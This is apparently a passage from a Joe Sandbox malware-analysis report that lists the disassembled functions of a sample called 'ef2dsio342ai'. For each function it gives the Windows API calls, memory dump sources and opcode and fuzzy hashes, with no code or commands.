                                                                                                      • Instruction Fuzzy Hash: B641C132A002049FDB20DF78C881A6AB7E6EF88314F5945A9F555EB395D771ED01CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCursorPos.USER32(?), ref: 00D119E1
                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00D119FE
                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00D11A23
                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00D11A3D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                      • String ID:
                                                                                                      • API String ID: 4210589936-0
                                                                                                      • Opcode ID: 1267c564f5f1f1e8ac68211444d92af609a2a0c2e08b73e6753a410998cf9565
                                                                                                      • Instruction ID: a016ccd73e3d4a9f4c2c8d89630a71f49409ca81a390c59fc4220d3900756bc2
                                                                                                      • Opcode Fuzzy Hash: 1267c564f5f1f1e8ac68211444d92af609a2a0c2e08b73e6753a410998cf9565
                                                                                                      • Instruction Fuzzy Hash: 52419375A0461AFBDF059F68D844BEEBB71FF05324F144215F969A3290CB30AA94CB71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetInputState.USER32 ref: 00D84225
                                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00D8427C
                                                                                                      • TranslateMessage.USER32(?), ref: 00D842A5
                                                                                                      • DispatchMessageW.USER32(?), ref: 00D842AF
                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D842C0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                      • String ID:
                                                                                                      • API String ID: 2256411358-0
                                                                                                      • Opcode ID: 7b2bbd69f48793c312fa4c5b244010cfc0ea1438bf8cffa3ac253f32fba29f52
                                                                                                      • Instruction ID: 5f346603c540141361a2ecd2ce8475ce9a138c9522c538d37f34f6f507f13beb
                                                                                                      • Opcode Fuzzy Hash: 7b2bbd69f48793c312fa4c5b244010cfc0ea1438bf8cffa3ac253f32fba29f52
                                                                                                      • Instruction Fuzzy Hash: D231D570948387DEEB34FB649C49BBB37ACEB15305F08056DE463C62A0E7649885CB35
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00D721A5
                                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00D72251
                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00D72259
                                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00D7226A
                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00D72272
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3382505437-0
                                                                                                      • Opcode ID: f96bb972d1711bf3b276dff7d833166269782f49575bd0c27d2f6393acaab49d
                                                                                                      • Instruction ID: f7cf6873b3596e7b25260fe98f73e02df1823b55ec94a0821979a44ff7571ff9
                                                                                                      • Opcode Fuzzy Hash: f96bb972d1711bf3b276dff7d833166269782f49575bd0c27d2f6393acaab49d
                                                                                                      • Instruction Fuzzy Hash: 7031CF71900259EFDB00CFA8CD89AEE3BB6EB15314F148225FA25E72D1D370E940CBA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00D8D895
                                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00D8D8CC
                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00D8CB7B,00000000), ref: 00D8D911
                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00D8CB7B,00000000), ref: 00D8D925
                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00D8CB7B,00000000), ref: 00D8D94F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 3191363074-0
                                                                                                      • Opcode ID: 0b744086c97257862eea7371afb45fae7c0b43b5c50e461711af24d7dc1bf102
                                                                                                      • Instruction ID: 2e0af7987e58d1eefeaf6c21bc8b2ff67854640398a0ad381285dae248271802
                                                                                                      • Opcode Fuzzy Hash: 0b744086c97257862eea7371afb45fae7c0b43b5c50e461711af24d7dc1bf102
                                                                                                      • Instruction Fuzzy Hash: D7312A71900305AFDB24EFA5D884AABBBFAEB05354B14442EE546D2680EA34EE41DB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00DA60A4
                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00DA60FC
                                                                                                      • _wcslen.LIBCMT ref: 00DA610E
                                                                                                      • _wcslen.LIBCMT ref: 00DA6119
                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DA6175
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$_wcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 763830540-0
                                                                                                      • Opcode ID: 206a4b4bbc8573507690bdc156a70e26ed3b1549d0b8341568ce9186a71cb68b
                                                                                                      • Instruction ID: cb6bce6404d5ef3c154a8a287d481adb79d430192b8658f92c115c44462f601a
                                                                                                      • Opcode Fuzzy Hash: 206a4b4bbc8573507690bdc156a70e26ed3b1549d0b8341568ce9186a71cb68b
                                                                                                      • Instruction Fuzzy Hash: C9219175900208ABDF109FA4DC84AEEBBB8FF06324F184216F925DA284E770D985CF70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • IsWindow.USER32(00000000), ref: 00D912AE
                                                                                                      • GetForegroundWindow.USER32 ref: 00D912C5
                                                                                                      • GetDC.USER32(00000000), ref: 00D91301
                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00D9130D
                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00D91345
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 4156661090-0
                                                                                                      • Opcode ID: 4f00dfa3c3f489c726c562f98072e562f4d208036e87e0b19ff791858bf117ac
                                                                                                      • Instruction ID: 1ea3d27d599f2f0a066147b9efde8b45ec16fd591ea45d5ef10c8d6d770a0b0a
                                                                                                      • Opcode Fuzzy Hash: 4f00dfa3c3f489c726c562f98072e562f4d208036e87e0b19ff791858bf117ac
                                                                                                      • Instruction Fuzzy Hash: BB218E7A600214AFDB04EF65D885AAEB7F5FF49340B048469E94AD7751CA34EC44CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00D4D166
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D4D189
                                                                                                        • Part of subcall function 00D43BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D36A99,?,0000015D,?,?,?,?,00D385D0,000000FF,00000000,?,?), ref: 00D43BE2
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D4D1AF
                                                                                                      • _free.LIBCMT ref: 00D4D1C2
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4D1D1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 336800556-0
                                                                                                      • Opcode ID: ca489924f2c326489f56c15af2b8bf83684dbe6cc880ab355e2a436224f45b67
                                                                                                      • Instruction ID: 7d6c769a861cde7055f965e1ee44740569d0226e6967c570bd08227481e8d8c1
                                                                                                      • Opcode Fuzzy Hash: ca489924f2c326489f56c15af2b8bf83684dbe6cc880ab355e2a436224f45b67
                                                                                                      • Instruction Fuzzy Hash: 5E018F72A027157F27216ABA5C8CD7B7A6FDFC7FA1318012AFD05C6340DE618C0285B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _malloc.LIBCMT ref: 10011738
                                                                                                        • Part of subcall function 10005652: __FF_MSGBANNER.LIBCMT ref: 10005669
                                                                                                        • Part of subcall function 10005652: __NMSG_WRITE.LIBCMT ref: 10005670
                                                                                                        • Part of subcall function 10005652: RtlAllocateHeap.NTDLL(01350000,00000000,00000001,00000001,?,?,?,10004E11,00000001,00000000,?,0000001C,?,10004D4B,1000471D,10023A08), ref: 10005695
                                                                                                      • _free.LIBCMT ref: 1001174B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1020059152-0
                                                                                                      • Opcode ID: 70172d75007b5beffa53888d85b7fa41bc5892282b0d6dcfbd787931e47a7483
                                                                                                      • Instruction ID: dbc496f2f36bfa27c5ae171b0839de1295db79647446b628e54d1a9e09d1f389
                                                                                                      • Opcode Fuzzy Hash: 70172d75007b5beffa53888d85b7fa41bc5892282b0d6dcfbd787931e47a7483
                                                                                                      • Instruction Fuzzy Hash: DF110A3540C612ABEB25AF74AC4869E37E4EF042E0B154425FE449F2D0EB31D9C08755
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D11F33
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00D11F42
                                                                                                      • BeginPath.GDI32(?), ref: 00D11F59
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00D11F82
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                      • String ID:
                                                                                                      • API String ID: 3225163088-0
                                                                                                      • Opcode ID: bdb8c346b0a4854ab46851df2c31743eb3bcc59cc87d1785603610b9967f5040
                                                                                                      • Instruction ID: f2459f30244069c83121f9a009a09d888c46b6a4f45977d97779f0ca47437393
                                                                                                      • Opcode Fuzzy Hash: bdb8c346b0a4854ab46851df2c31743eb3bcc59cc87d1785603610b9967f5040
                                                                                                      • Instruction Fuzzy Hash: 2521B032841345EFDB10AF64FC487BA3BB9BB10351F141215F911EA2A1DBB08992CFB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(0000000A,?,?,00D3F66E,00D3547F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D4318D
                                                                                                      • _free.LIBCMT ref: 00D431C2
                                                                                                      • _free.LIBCMT ref: 00D431E9
                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D431F6
                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D431FF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3170660625-0
                                                                                                      • Opcode ID: 2c3ed02e964b60f31c6d24b6e7c6f0855fbe44ce263b2fc5fce97ee4b201376a
                                                                                                      • Instruction ID: bd1998193f933b0fb33da6b42d2a8e0836d7e792923aadb166602bbe40be7228
                                                                                                      • Opcode Fuzzy Hash: 2c3ed02e964b60f31c6d24b6e7c6f0855fbe44ce263b2fc5fce97ee4b201376a
                                                                                                      • Instruction Fuzzy Hash: 95012876641B017BCA12733DAC8AD2B366EDFC13707240525F426D22D1EFB0CE024170
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 1000D95E: __getptd_noexit.LIBCMT ref: 1000D95F
                                                                                                        • Part of subcall function 1000D95E: __amsg_exit.LIBCMT ref: 1000D96C
                                                                                                      • __amsg_exit.LIBCMT ref: 10010FF5
                                                                                                      • __lock.LIBCMT ref: 10011005
                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 10011022
                                                                                                      • _free.LIBCMT ref: 10011035
                                                                                                      • InterlockedIncrement.KERNEL32(016FE3C8), ref: 1001104D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1931555351.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1931530312.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931580966.000000001001B000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931602166.0000000010022000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1931621641.0000000010026000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_10000000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1231874560-0
                                                                                                      • Opcode ID: ea4a01323ba776077954f8e4ac36fbb46c30fbb564b3b8fdc57aa9be0f71dc47
                                                                                                      • Instruction ID: d902fb57865900aa4fca4ae26e154631598be61bfb14daaf061bef3277756d26
                                                                                                      • Opcode Fuzzy Hash: ea4a01323ba776077954f8e4ac36fbb46c30fbb564b3b8fdc57aa9be0f71dc47
                                                                                                      • Instruction Fuzzy Hash: 7401AD36D05A21ABE757DF54988578E73A0FF08792F12400AF8106B694C7B4A9C2CBC1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D707D1,80070057,?,?,?,00D70BEE), ref: 00D708BB
                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D707D1,80070057,?,?), ref: 00D708D6
                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D707D1,80070057,?,?), ref: 00D708E4
                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D707D1,80070057,?), ref: 00D708F4
                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D707D1,80070057,?,?), ref: 00D70900
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 3897988419-0
                                                                                                      • Opcode ID: 526b616cf62943e9053093f221eb73e5c1f37d5cce63958d28c8add5f9dbd0b9
                                                                                                      • Instruction ID: fbaa574a6fa85710ab1eceebf63dba8c48a3b04f36f6c811eeccf07d10b9c1d8
                                                                                                      • Opcode Fuzzy Hash: 526b616cf62943e9053093f221eb73e5c1f37d5cce63958d28c8add5f9dbd0b9
                                                                                                      • Instruction Fuzzy Hash: 25018FB6600309EFDB105F64DC04B9A7EBEEB48751F188024FA4AD2351E774DD009BB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00D7F1C3
                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00D7F1D1
                                                                                                      • Sleep.KERNEL32(00000000), ref: 00D7F1D9
                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00D7F1E3
                                                                                                      • Sleep.KERNEL32 ref: 00D7F21F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                      • String ID:
                                                                                                      • API String ID: 2833360925-0
                                                                                                      • Opcode ID: e37dc5b96bfdfb74cd3fe42faba3407b3ecef21c62ab653c47cf61a0ffe45825
                                                                                                      • Instruction ID: 99ddc6cfcef8b16f9da63488d71a3ad121d0376afc70a8960914b24927e6bb54
                                                                                                      • Opcode Fuzzy Hash: e37dc5b96bfdfb74cd3fe42faba3407b3ecef21c62ab653c47cf61a0ffe45825
                                                                                                      • Instruction Fuzzy Hash: B3018C35C00719DBCF10AFA4EC49AEDBB79FB09301F414065E946F2250EB309554CB79
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D719A4
                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00D7142B,?,?,?), ref: 00D719B0
                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D7142B,?,?,?), ref: 00D719BF
                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D7142B,?,?,?), ref: 00D719C6
                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D719DD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 842720411-0
                                                                                                      • Opcode ID: 39ce056fd941bf847af33f8e3eea3bdb687b62b30971e744f3170fbf20026dc9
                                                                                                      • Instruction ID: 0a38f633a79ab6a2ff7a1fd1596c176647479642e306a40bc94e61f5f644df83
                                                                                                      • Opcode Fuzzy Hash: 39ce056fd941bf847af33f8e3eea3bdb687b62b30971e744f3170fbf20026dc9
                                                                                                      • Instruction Fuzzy Hash: 77016DB9201305BFDB114FA9DC49A6A3B7EEF8A360B154418F946C3360EB31DD408A70
                                                                                                      Uniqueness
